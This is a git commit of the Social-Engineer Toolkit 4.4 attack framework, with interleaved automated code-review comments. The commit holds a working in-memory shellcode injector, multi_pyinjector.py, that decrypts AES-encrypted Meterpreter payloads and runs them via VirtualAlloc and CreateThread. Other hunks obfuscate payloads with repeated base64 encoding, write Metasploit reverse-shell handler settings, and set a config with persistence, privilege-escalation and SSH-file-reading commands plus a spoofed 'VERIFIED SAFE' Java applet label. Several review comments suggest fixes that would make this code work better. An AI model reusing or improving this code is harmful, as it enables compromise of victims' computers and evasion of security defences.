The Social-Engineer Toolkit 4.4 release code

This commit is contained in:
trustedsec 2013-01-23 20:50:35 -05:00
parent a3a69e7abf
commit 86d601d5e6
16 changed files with 569 additions and 232 deletions

78
config/set_config.py Normal file

@ -0,0 +1,78 @@
#!/usr/bin/python
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# Settings should be modified in the set_config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set_config.py generated: 2013-01-23 20:49:13.505678 #
# #
#######################################################################
CONFIG_DATE='2013-01-23 20:49:13.505678'
METASPLOIT_PATH="/opt/metasploit/msf3"
METASPLOIT_DATABASE="postgresql"
ENCOUNT=4
AUTO_MIGRATE=False
CUSTOM_EXE="legit.binary"
BACKDOOR_EXECUTION=True
METERPRETER_MULTI_SCRIPT=False
LINUX_METERPRETER_MULTI_SCRIPT=False
METERPRETER_MULTI_COMMANDS="run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem"
LINUX_METERPRETER_MULTI_COMMANDS="uname;id;cat ~/.ssh/known_hosts"
METASPLOIT_IFRAME_PORT=8080
ETTERCAP=False
ETTERCAP_PATH="/usr/share/ettercap"
ETTERCAP_INTERFACE="eth0"
DSNIFF=False
AUTO_DETECT=False
SENDMAIL=False
EMAIL_PROVIDER="GMAIL"
WEBATTACK_EMAIL=False
TIME_DELAY_EMAIL="1"
MLITM_PORT=80
APACHE_SERVER=False
APACHE_DIRECTORY="/var/www"
WEB_PORT=80
SELF_SIGNED_APPLET=False
JAVA_ID_PARAM="Trusted Java Applet (VERIFIED SAFE)"
JAVA_REPEATER=False
JAVA_TIME="200"
WEBATTACK_SSL=False
SELF_SIGNED_CERT=False
PEM_CLIENT="/root/newcert.pem"
PEM_SERVER="/root/newreq.pem"
WEBJACKING_TIME=2000
COMMAND_CENTER_INTERFACE="127.0.0.1"
COMMAND_CENTER_PORT=44444
SET_INTERACTIVE_SHELL=True
TERMINAL="SOLO"
DIGITAL_SIGNATURE_STEAL=True
UPX_ENCODE=True
UPX_PATH="/usr/bin/upx"
AUTO_REDIRECT=True
HARVESTER_REDIRECT=False
HARVESTER_URL="http://thishasnotbeenset"
UNC_EMBED=False
ACCESS_POINT_SSID="linksys"
AIRBASE_NG_PATH="/usr/local/sbin/airbase-ng"
DNSSPOOF_PATH="/usr/local/sbin/dnsspoof"
AP_CHANNEL=9
POWERSHELL_INJECTION=True
POWERSHELL_INJECT_PAYLOAD_X64="windows/x64/meterpreter/reverse_tcp"
POWERSHELL_INJECT_PAYLOAD_X86="windows/meterpreter/reverse_tcp"
POWERSHELL_VERBOSE=False
WEB_PROFILER=False
DEPLOY_OSX_LINUX_PAYLOADS="False"
OSX_REVERSE_PORT=8080
LINUX_REVERSE_PORT=8081
USER_AGENT_STRING="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
SET_SHELL_STAGER=False
AUTOMATIC_LISTENER=True
METASPLOIT_MODE=True
DEPLOY_BINARIES="YES"
CLEANUP_ENABLED_DEBUG="False"
TRACK_EMAIL_ADDRESSES="False"
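Review bot: A generated artifact is being checked in: the header on the `## DO NOT MODIFY THIS FILE ##` line says this file is produced by SET's 'Update SET Configuration' routine, yet it is committed with one machine's state — a generation timestamp on the `CONFIG_DATE` line, a site-specific address inside `METERPRETER_MULTI_COMMANDS`, and local paths such as `PEM_CLIENT`/`PEM_SERVER`. Every pull will overwrite a user's own generated copy, and operator-specific values end up in public history. Consider excluding config/set_config.py from version control and regenerating it on first run, or committing only a template with clearly marked placeholder values.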

33
encrypt.py Normal file

@ -0,0 +1,33 @@
from Crypto.Cipher import AES
def EncryptAES(secret, data):
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# random value here to randomize builds
a = 50 * 5
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
#secret = os.urandom(BLOCK_SIZE)
cipher = AES.new(secret)
aes = EncodeAES(cipher, data)
return aes
secret = os.urandom(32)
fileopen = file("social-engineer-toolkit/src/payloads/set_payloads/multi_pyinjector.binary", "rb")
data = fileopen.read()
encrypted_blob = EncryptAES(secret, data)
filewrite = file("multi_pyinjector.encrypted", "wb")
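Review bot: `base64` and `os` are used on the `EncodeAES`/`DecodeAES` lambdas and on the `secret = os.urandom(32)` line, but the only import in this new file is `from Crypto.Cipher import AES`, so the script raises NameError as soon as EncryptAES runs; add `import base64` and `import os` next to the existing import. `AES.new(secret)` with no mode argument falls back to PyCrypto's default mode, and padding with `'{'` followed by `rstrip(PADDING)` on decrypt also strips genuine trailing `{` bytes from the binary payload read on the `data = fileopen.read()` line — the same construction is repeated in setcore.py's encryptAES and in multi_pyinjector.py's DecryptAES, so the padding scheme should be changed in all three together (a length-based padding that can be removed unambiguously) and the mode stated explicitly in the comment. `DecodeAES` and `a = 50 * 5` are assigned but never used, and the `filewrite` handle opened on the last visible line is not closed in what is shown; the hunk continues past what is visible here.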


@ -1,3 +1,26 @@
~~~~~~~~~~~~~~~~
version 4.4
~~~~~~~~~~~~~~~
* Added new folder structure under src/webattack/java_applet - this includes again the source code of the Java Applet.
* Added compile program for making applets in the java_applet directory.
* Recompliled the Java Applet to add better obfsucation.
* Edited payloadgen to utilize more base64 encoded techniques.
* Added better stability to the multi injector payload when ports are not found
* Added new core library that called EncryptAES which allows you to encrypt specific string data
* Added obfsucation into the Java Applet and placed new params to pull
* Rewrote multipyinjector for better error handling and performance
* Added AES 256 encryption to the multi-pyinjector - before it would write out the shellcode to tmp files, instead it encrypts the entire data via 256 aes then pulls via command line and does not write out the files
* Added ability for SET and Java Applet to handle multi-pyinjector AES encrypted payloads through the pycrypto modules
* Modified the payload creation to encrypt payloads on the fly with a randomized cipher key exchange - each new payload generated will be a completely different AES cipher key
* Fixed a bug that would cause powershell to not fire properly when using multi-pyinjector. It now prompts for an additional port and appends it to the meta_config_multi_pyinjector answer file for metasploit
* Fixed a bug that would cause pyinjector to not properly execucute when not using powershell injection
* Updated the Java Applet to include the new multi pyinjectir cipher key addition once executed
* New encrypted binary multi pyinjector in place
* Added time delay between firing multiple payloads. When executing multiple instances stdapi.rb freaked out and wouldn't load. This didn't hinder the shell but you would manually need to add the lib in order to get the standard libraries within meterpreter. This has since been fixed.
* Large redesign of multi-pyinjector which is now streamlined to be as effecient as possible
* Added better checking for multi pyinjector when using powershell to add new detections around port.options
~~~~~~~~~~~~~~~~
version 4.3.10
~~~~~~~~~~~~~~~~

6
set

@ -170,9 +170,9 @@ except KeyboardInterrupt:
print "\n\nThank you for " + bcolors.RED+"shopping" + bcolors.ENDC+" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"
# handle exceptions
except Exception, error:
log(error)
print "\n\n[!] Something went wrong, printing the error: "+ str(error)
#except Exception, error:
# log(error)
# print "\n\n[!] Something went wrong, printing the error: "+ str(error)
# cleanup routine
cleanup_routine()
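Review bot: The top-level handler on the `except Exception, error:` line logs only `str(error)`, so the stack trace showing where in SET the failure occurred is discarded — the set_logs entries deleted in this same commit (`name 'web_port' is not defined`, `invalid syntax (...)`) illustrate how little the message alone locates. Logging `traceback.format_exc()` together with the message would keep the location (`traceback` is stdlib; check whether `set` already imports it). The enclosing try block starts outside the hunk.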


@ -494,7 +494,6 @@ try:
print_status("Reverse Shell takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(choice9, choice2, portnum)
if choice1 == "shellcode/pyinject":
shellcode_port = portnum.replace("LPORT=", "")
@ -509,7 +508,12 @@ try:
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
shellcode = multipyinject_payload
# we first need to encrypt the payload via AES 256
# def encryptAES(secret, data):
print_status("Encrypting the shellcode via 256 AES encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
filewrite = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "w")
filewrite.write(shellcode)
filewrite.close()
@ -534,8 +538,13 @@ try:
data = base64.b64encode(data)
# again 8
data = base64.b64encode(data)
# ok ok last time
# 9
data = base64.b64encode(data)
# 10
data = base64.b64encode(data)
# last one
data = base64.b64encode(data)
#
filewrite = file("%s/src/program_junk/meterpreter.alpha" % (definepath), "w")
filewrite.write(data)
filewrite.close()
@ -568,6 +577,9 @@ try:
alpha_shellcode = fileopen2.read().rstrip()
data = fileopen.read()
data = data.replace('param name="2" value=""', 'param name="2" value="%s"' % (alpha_shellcode))
if choice1 == "shellcode/multipyinject":
secret = base64.b64encode(secret)
data = data.replace('param name="10" value=""', 'param name="10" value ="%s"' % (secret))
filewrite.write(data)
# close file
filewrite.close()
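Review bot: The comment on the `# we first need to encrypt the payload via AES 256` line should say what this step does and does not provide: the key generated on the `secret = os.urandom(32)` line is base64-encoded and written into the same applet page as the ciphertext on the `param name="10"` replacement line, so whoever holds the page holds the key, and this is a transport encoding rather than confidentiality — the `print_status("Dynamic cipher key created and embedded into payload.")` message describes that accurately, the "256 AES encryption" status line less so. On that replacement line the substituted attribute reads `value ="%s"` while the template and the `param name="2"` replacement above use `value=""`; browsers accept either, but the stray space is inconsistent and worth dropping. `secret` is assigned only inside the first `if choice1 == "shellcode/multipyinject":` branch and read in a later branch guarded by the same condition, which works but is fragile if either condition is edited independently. The enclosing try block starts and ends outside these hunks.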


@ -17,6 +17,7 @@ import string
import inspect
import base64
from src.core import dictionaries
from Crypto.Cipher import AES
# used to grab the true path for current working directory
definepath = os.getcwd()
@ -215,7 +216,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '4.3.10'
define_version = '4.4'
return define_version
class create_menu:
@ -834,8 +835,8 @@ def show_banner(define_version,graphic):
print bcolors.BLUE + """
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Turbulence""" + bcolors.BLUE + """' [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """The Goat""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]
@ -1344,7 +1345,6 @@ def exit_set():
# these are payloads that are callable
def metasploit_shellcode(payload):
counter = 0
if payload == "windows/meterpreter/reverse_tcp":
@ -1365,3 +1365,30 @@ def metasploit_shellcode(payload):
counter = 1
if counter == 0:
return ""
# here we encrypt via aes, will return encrypted string based on secret key which is random
def encryptAES(secret, data):
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# random value here to randomize builds
a = 50 * 5
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
#secret = os.urandom(BLOCK_SIZE)
cipher = AES.new(secret)
aes = EncodeAES(cipher, data)
return str(aes)
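Review bot: `from Crypto.Cipher import AES` is added as an unconditional module-level import of setcore.py, which appears to be imported by the rest of SET, so a system without pycrypto now fails at startup instead of only when the multi-pyinjector path in encryptAES is taken; import AES lazily inside encryptAES, or wrap the import in `try/except ImportError` and report the missing dependency when the function is called. encryptAES duplicates EncryptAES in the new top-level encrypt.py, `DecodeAES` and `a = 50 * 5` are assigned but never used, and `return str(aes)` wraps a value that `base64.b64encode` already returns as str. A docstring such as `"""Return base64(AES(secret, pad(data))), data padded to a 32-byte multiple; secret must be an AES key length accepted by AES.new."""` would document the key requirement that otherwise only surfaces as an exception from AES.new.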

Binary file not shown.

BIN
src/html/msf.exe Normal file

Binary file not shown.

Binary file not shown.


@ -1,113 +0,0 @@
ERROR: 2012-12-12 11:22:41.791385: [Errno 5] Input/output error
ERROR: 2012-12-12 12:28:36.563129: [Errno 5] Input/output error
ERROR: 2012-12-12 16:35:37.579779: invalid syntax (cloner.py, line 266)
ERROR: 2012-12-12 16:37:02.980444: invalid syntax (cloner.py, line 267)
ERROR: 2012-12-12 16:37:54.222136: invalid syntax (harvester.py, line 31)
ERROR: 2012-12-12 16:38:31.807992: 'bool' object has no attribute 'lower'
ERROR: 2012-12-12 21:25:48.866276: invalid syntax (smtp_web.py, line 225)
ERROR: 2012-12-13 20:57:12.055093: invalid syntax (spawn.py, line 472)
ERROR: 2012-12-13 20:57:48.490826: [Errno 5] Input/output error
ERROR: 2012-12-13 21:07:07.837400: name 'web_port' is not defined
ERROR: 2012-12-13 21:07:30.029539: [Errno 5] Input/output error
ERROR: 2012-12-13 21:08:12.267803: name 'web_port' is not defined
ERROR: 2012-12-13 21:08:15.202276: [Errno 5] Input/output error
ERROR: 2012-12-13 21:09:07.510008: name 'web_port' is not defined
ERROR: 2012-12-13 21:09:08.744689: [Errno 5] Input/output error
ERROR: 2012-12-13 21:10:00.582049: name 'web_port' is not defined
ERROR: 2012-12-13 21:10:22.066220: cannot concatenate 'str' and 'datetime.datetime' objects
ERROR: 2012-12-13 21:12:01.132327: name 'web_port' is not defined
ERROR: 2012-12-13 21:12:19.470554: [Errno 5] Input/output error
ERROR: 2012-12-13 21:18:59.546472: name 'web_port' is not defined
ERROR: 2012-12-13 21:19:24.412603: [Errno 5] Input/output error
ERROR: 2012-12-13 21:23:43.224123: name 'web_port' is not defined
ERROR: 2012-12-13 21:23:50.333043: [Errno 5] Input/output error
ERROR: 2012-12-13 21:27:31.529504: name 'web_port' is not defined
ERROR: 2012-12-13 21:29:38.154499: [Errno 5] Input/output error
ERROR: 2012-12-13 22:02:40.790975: name 'web_port' is not defined
ERROR: 2012-12-13 22:02:40.800465: [Errno 98] Address already in use
ERROR: 2012-12-13 22:06:39.624426: name 'web_port' is not defined
ERROR: 2012-12-13 22:06:39.633158: [Errno 98] Address already in use
ERROR: 2012-12-13 22:06:46.897699: [Errno 5] Input/output error
ERROR: 2012-12-13 22:07:39.160490: name 'web_port' is not defined
ERROR: 2012-12-13 22:10:32.951421: [Errno 5] Input/output error
ERROR: 2012-12-13 22:13:28.600808: EOL while scanning string literal (create_payloads.py, line 480)
ERROR: 2012-12-13 22:14:39.979606: name 'web_port' is not defined
ERROR: 2012-12-13 22:16:38.989231: [Errno 5] Input/output error
ERROR: 2012-12-13 22:22:49.945250: name 'web_port' is not defined
ERROR: 2012-12-13 22:25:29.054218: [Errno 5] Input/output error
ERROR: 2012-12-13 22:27:50.504399: name 'web_port' is not defined
ERROR: 2012-12-13 22:32:13.784220: [Errno 5] Input/output error
ERROR: 2012-12-13 22:32:43.383300: name 'web_port' is not defined
ERROR: 2012-12-13 22:33:22.292290: [Errno 5] Input/output error
ERROR: 2012-12-13 22:35:27.075836: name 'web_port' is not defined
ERROR: 2012-12-13 22:36:34.170682: [Errno 5] Input/output error
ERROR: 2012-12-13 22:40:12.579449: name 'web_port' is not defined
ERROR: 2012-12-13 22:41:20.754789: [Errno 5] Input/output error
ERROR: 2012-12-13 22:41:35.620738: name 'web_port' is not defined
ERROR: 2012-12-13 22:42:25.262805: [Errno 5] Input/output error
ERROR: 2012-12-13 22:42:44.974306: name 'web_port' is not defined
ERROR: 2012-12-13 22:43:10.886806: [Errno 5] Input/output error
ERROR: 2012-12-13 22:47:12.170507: name 'web_port' is not defined
ERROR: 2012-12-13 22:47:37.132813: [Errno 5] Input/output error
ERROR: 2012-12-13 22:47:58.511746: name 'web_port' is not defined
ERROR: 2012-12-13 22:49:40.339660: [Errno 5] Input/output error
ERROR: 2012-12-13 22:49:53.850571: name 'web_port' is not defined
ERROR: 2012-12-13 22:50:48.128978: [Errno 5] Input/output error
ERROR: 2012-12-13 22:52:44.280341: name 'web_port' is not defined
ERROR: 2012-12-13 22:53:20.119714: [Errno 5] Input/output error
ERROR: 2012-12-13 22:56:52.827255: name 'web_port' is not defined
ERROR: 2012-12-13 22:57:27.162101: [Errno 5] Input/output error
ERROR: 2012-12-13 23:00:16.118774: name 'web_port' is not defined
ERROR: 2012-12-13 23:00:33.627619: [Errno 5] Input/output error
ERROR: 2012-12-13 23:05:31.936038: name 'web_port' is not defined
ERROR: 2012-12-13 23:05:31.941373: [Errno 98] Address already in use
ERROR: 2012-12-13 23:05:54.322868: name 'web_port' is not defined
ERROR: 2012-12-13 23:06:13.186466: [Errno 5] Input/output error
ERROR: 2012-12-13 23:18:42.330107: name 'web_port' is not defined
ERROR: 2012-12-13 23:19:26.940339: [Errno 5] Input/output error
ERROR: 2012-12-13 23:21:25.910619: name 'web_port' is not defined
ERROR: 2012-12-13 23:22:37.851963: [Errno 5] Input/output error
ERROR: 2012-12-14 22:21:57.260355: name 'web_port' is not defined
ERROR: 2012-12-14 22:23:24.674513: [Errno 5] Input/output error
ERROR: 2012-12-14 22:30:47.772754: name 'web_port' is not defined
ERROR: 2012-12-14 22:32:48.268551: [Errno 5] Input/output error
ERROR: 2012-12-17 09:24:12.950125: name 'web_port' is not defined
ERROR: 2012-12-17 09:25:31.741929: [Errno 5] Input/output error
ERROR: 2012-12-18 16:42:22.260306: name 'web_port' is not defined
ERROR: 2012-12-18 16:44:58.901379: name 'web_port' is not defined
ERROR: 2012-12-19 19:49:49.842477: name 'web_port' is not defined
ERROR: 2012-12-19 19:53:06.614479: [Errno 5] Input/output error
ERROR: 2012-12-19 21:17:42.633949: name 'web_port' is not defined
ERROR: 2012-12-19 21:19:48.873944: [Errno 5] Input/output error
ERROR: 2012-12-19 21:23:30.062258: name 'web_port' is not defined
ERROR: 2012-12-21 08:40:23.535243: name 'web_port' is not defined
ERROR: 2012-12-21 08:51:10.471013: [Errno 2] No such file or directory: 'src/html/Signed_Update.jar.orig'
ERROR: 2012-12-21 08:53:22.207645: name 'web_port' is not defined
ERROR: 2012-12-21 09:01:29.446031: name 'web_port' is not defined
ERROR: 2012-12-21 09:03:17.953215: name 'web_port' is not defined
ERROR: 2012-12-21 09:05:10.293159: name 'web_port' is not defined
ERROR: 2012-12-21 09:05:10.295066: [Errno 98] Address already in use
ERROR: 2012-12-21 15:13:47.810896: name 'web_port' is not defined
ERROR: 2012-12-21 15:16:10.450646: name 'web_port' is not defined
ERROR: 2012-12-21 15:25:43.490438: name 'web_port' is not defined
ERROR: 2012-12-21 15:25:43.496720: [Errno 98] Address already in use
ERROR: 2012-12-21 15:26:04.237449: name 'web_port' is not defined
ERROR: 2012-12-21 15:26:04.246570: [Errno 98] Address already in use
ERROR: 2012-12-21 15:26:08.031538: [Errno 5] Input/output error
ERROR: 2012-12-21 15:26:14.869427: [Errno 5] Input/output error
ERROR: 2012-12-21 15:26:36.229864: name 'web_port' is not defined
ERROR: 2012-12-21 15:34:00.721348: [Errno 5] Input/output error
ERROR: 2012-12-21 15:37:00.760194: name 'web_port' is not defined
ERROR: 2012-12-21 15:37:57.816859: name 'web_port' is not defined
ERROR: 2012-12-21 15:37:57.826239: [Errno 98] Address already in use
ERROR: 2012-12-21 15:39:36.469439: [Errno 5] Input/output error
ERROR: 2012-12-21 15:39:59.002366: name 'web_port' is not defined
ERROR: 2012-12-21 15:40:23.929096: [Errno 5] Input/output error
ERROR: 2012-12-21 15:42:57.839833: name 'web_port' is not defined
ERROR: 2012-12-21 15:43:21.908972: [Errno 5] Input/output error
ERROR: 2012-12-22 13:25:49.074554: name 'web_port' is not defined
ERROR: 2012-12-22 13:26:14.671602: class bcolors has no attribute 'EDNC'
ERROR: 2012-12-22 13:30:17.625793: name 'web_port' is not defined
ERROR: 2012-12-22 13:31:08.153861: [Errno 5] Input/output error
ERROR: 2012-12-30 11:03:39.183398: name 'web_port' is not defined
ERROR: 2012-12-30 11:03:57.931752: [Errno 5] Input/output error


@ -15,26 +15,36 @@ else:
filewrite = file("src/program_junk/ipaddr.file", "w")
filewrite.write(ipaddr)
if os.path.isfile("src/program_junk/port.options"):
fileopen = file("src/program_junk/port.options", "r")
port = fileopen.read()
else:
filewrite=file("src/program_junk/port.options", "w")
port = raw_input("Enter the port number for the reverse [443]: ")
if port == "":
port = "443"
filewrite.write(port)
powershell_inject_x64 = check_config("POWERSHELL_INJECT_PAYLOAD_X64=")
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
print_status("Generating x64-based powershell injection code...")
if validate_ip(ipaddr) == False:
powershell_inject_x64 = "windows/meterpreter/reverse_https"
powershell_inject_x86 = "windows/meterpreter/reverse_http"
powershell_inject_x64 = "windows/meterpreter/reverse_https"
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
fileopen = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "r")
data = fileopen.read()
match = re.search(port, data)
if not match:
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, port))
filewrite.close()
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
fileopen = file("%s/src/program_junk/port.options" % (definepath), "r")
port = fileopen.read()
if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
print_status("Generating x64-based powershell injection code...")
x64 = ""
x86 = ""
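Review bot: `match = re.search(port, data)` on the line after `data = fileopen.read()` treats the user-supplied port as a regular expression and matches it anywhere in the answer file, so a port of `443` is taken as already configured when the file merely contains `4433` or `8443`, and the append on the `filewrite.write("\nuse exploit/multi/handler...` line is skipped. Escape the value and anchor it to the LPORT entry, e.g. `match = re.search(r"^set LPORT %s$" % re.escape(port), data, re.M)` (assuming existing entries use the `set LPORT %s` form this hunk writes). The `fileopen` handles opened on the meta_config_multipyinjector and port.options lines are never closed, and the `port` read back from port.options is not stripped before it is compared and written. The enclosing else block starts outside the hunk.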

170
src/payloads/set_payloads/multi_pyinjector.py Normal file → Executable file

@ -1,121 +1,105 @@
#
# The Social-Engineer Toolkit (SET) Multi-Injector Payload
# For when one is just not enough.
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
# Version: 0.2
#
# This will spawn only a seperate thread per each shellcode instance.
#
# This will add as many payloads as you want to in order
# to inject purely into memory. Hot stuff.
# Written by: Dave Kennedy @ TrustedSec
#
#
# IMPORTANT: YOU NEED TO BYTE COMPILE THIS WITH PYINSTALLER 1.5
# OR PYINSTALLER 2.1 + (dev branch at this time). Known bug when
# calling the same executable within pyinstaller.
# Much cleaner and optimized code. No longer needs files and is passed via
# command line.
#
# Incorporates AES 256 Encryption when passing shellcode
import ctypes
import threading
import sys
import subprocess
import tempfile
from uuid import uuid4
import os
import base64
from Crypto.Cipher import AES
# define our shellcode injection code through ctypes
def inject(shellcode):
shellcode = shellcode.decode("string_escape")
shellcode = bytearray(shellcode)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode)))
ctypes.c_int(len(shellcode)))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
# this grabs the filename we need for our shellcode
try:
# this is the whole file that contains all of our
# shellcode, so for example all 5 would be in this file
shellcode_filename = sys.argv[1]
# this is the name of our exe
executable_filename = sys.argv[2]
except: sys.exit()
# if we are exeucuting seperate processes
execute_shellcode = 0
# this is where we wrote out files in order to execute each in individual processes
# pull the name of file we are executing from
naming = sys.argv[0]
execute_payload = ""
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
process = sys.argv[3]
execute_filename = sys.argv[4]
execute_shellcode = 1
except: pass
if execute_shellcode == 0:
# import in the shellcode
if os.path.isfile(tempfile.gettempdir() + "\\" + shellcode_filename):
fileopen = file(tempfile.gettempdir() + "\\" + shellcode_filename, "r")
shellcode = fileopen.read()
shellcode = shellcode.split(",")
if os.path.isfile(shellcode_filename):
fileopen = file(shellcode_filename, "r")
shellcode = fileopen.read()
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = file(payload_filename, "r")
shellcode = fileopen.read()
# if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret)
# our decrypted value for shellcode
shellcode = DecryptAES(cipher, shellcode)
# split our shellcode into a list
shellcode = shellcode.split(",")
# This is a hack job way of getting this to work, basically what is happening is when
# calling any shellcode works however if the destination does not allow the port the
# entire application will crash. We need to create completely seperate processes in order
# for it not to crash, so we'll spawn multiple instances of the same instance. Sucks but
# works. With with exitfunc thread/process, etc. ctypes hard crashes within python.
# except an indexerror and allow it to continue forward
except IndexError:
sys.exit()
filename = tempfile.gettempdir() + "\\" + executable_filename # cannot use based on byte compiled python.stack()[-1][1]
temp = executable_filename # inspect.stack()[-1][1]
# see if subprocess graced us with shellcode
try:
execute_payload = sys.argv[3]
except:
pass
random_name = tempfile.gettempdir() + "\\" + str(uuid4())
# grab initial count of how many we have in our array and write out tmp files
counter = 0
if execute_shellcode == 0:
counter = 1
if execute_payload == "":
for payload in shellcode:
filewrite = file(random_name + str(counter) + ".tmp", "w")
filewrite.write(payload)
filewrite.close()
counter = counter + 1
counter2 = 0
for payload in shellcode:
try:
if counter2 != counter:
use_filename = random_name + str(counter2) + ".tmp"
use_counter = 0
if os.path.isfile(filename):
subprocess.Popen(filename + " 1 1 1 %s" % (use_filename), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
use_counter = 1
if os.path.isfile(temp):
if use_counter == 0:
if temp.endswith(".py"):
subprocess.Popen("python " + temp + " 1 1 1 %s" % (use_filename), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
if temp.endswith(".exe"):
subprocess.Popen(temp + " 1 1 1 %s" % (use_filename), shell=True)
counter2 = counter2 + 1
except: pass
if payload != "":
# seperate process needed in order to work
# meterpreter crashes entire stack via ctypes
# standard threading does not work
subprocess.Popen(naming + " 1 1 " + payload, shell=True)
# if we passed a second argument through subprocess
# execute and inject the shellcode
if execute_payload != "":
inject(execute_payload)
# If we are running in a seperate process through subprocess
# then call the actual shellcode and load it into memory.
if execute_shellcode == 1:
execute_filename = execute_filename
fileopen = file(execute_filename, "r")
shellcode = fileopen.read()
# create the thread to shoot into memory
thread = threading.Thread(target=inject, args=(shellcode,))
# start the thread
thread.start()
